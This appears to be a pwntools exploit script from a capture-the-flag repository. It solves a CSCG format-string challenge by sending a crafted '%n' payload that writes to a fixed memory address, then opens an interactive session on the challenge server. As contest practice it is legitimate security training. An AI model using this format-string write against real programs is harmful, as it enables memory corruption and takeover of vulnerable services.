Files
ctf/2026/cscg/pwn/intro-pwn-2/exploit.py
2026-03-09 21:44:25 +01:00

44 lines
949 B
Python

from pwn import *
# Set the context for the binary
context.binary = './intro-fmt' # Replace with your binary's name
# Choose local or remote
LOCAL = False # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("ylsk7pjeqzunufomzpkd6bitjx-1024-intro-pwn-2.challenge.cscg.live", 443, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
def recv_until(delim):
return p.recvuntil(delim)
def interact():
p.interactive()
bug_addr = 0x40406c
# Example interaction
recv_until(b'What is your name?')
format_string = b""
format_string += b"%001c"
format_string += b"%0.0s" * 4
format_string += b"%0.0s" * 10
format_string += b"%n"
format_string += b"\n" * (8 - (len(format_string) % 8))
print(len(format_string) / 8)
format_string += p64(bug_addr)
print(format_string)
pause()
send_payload(format_string)
interact() # Keep the shell open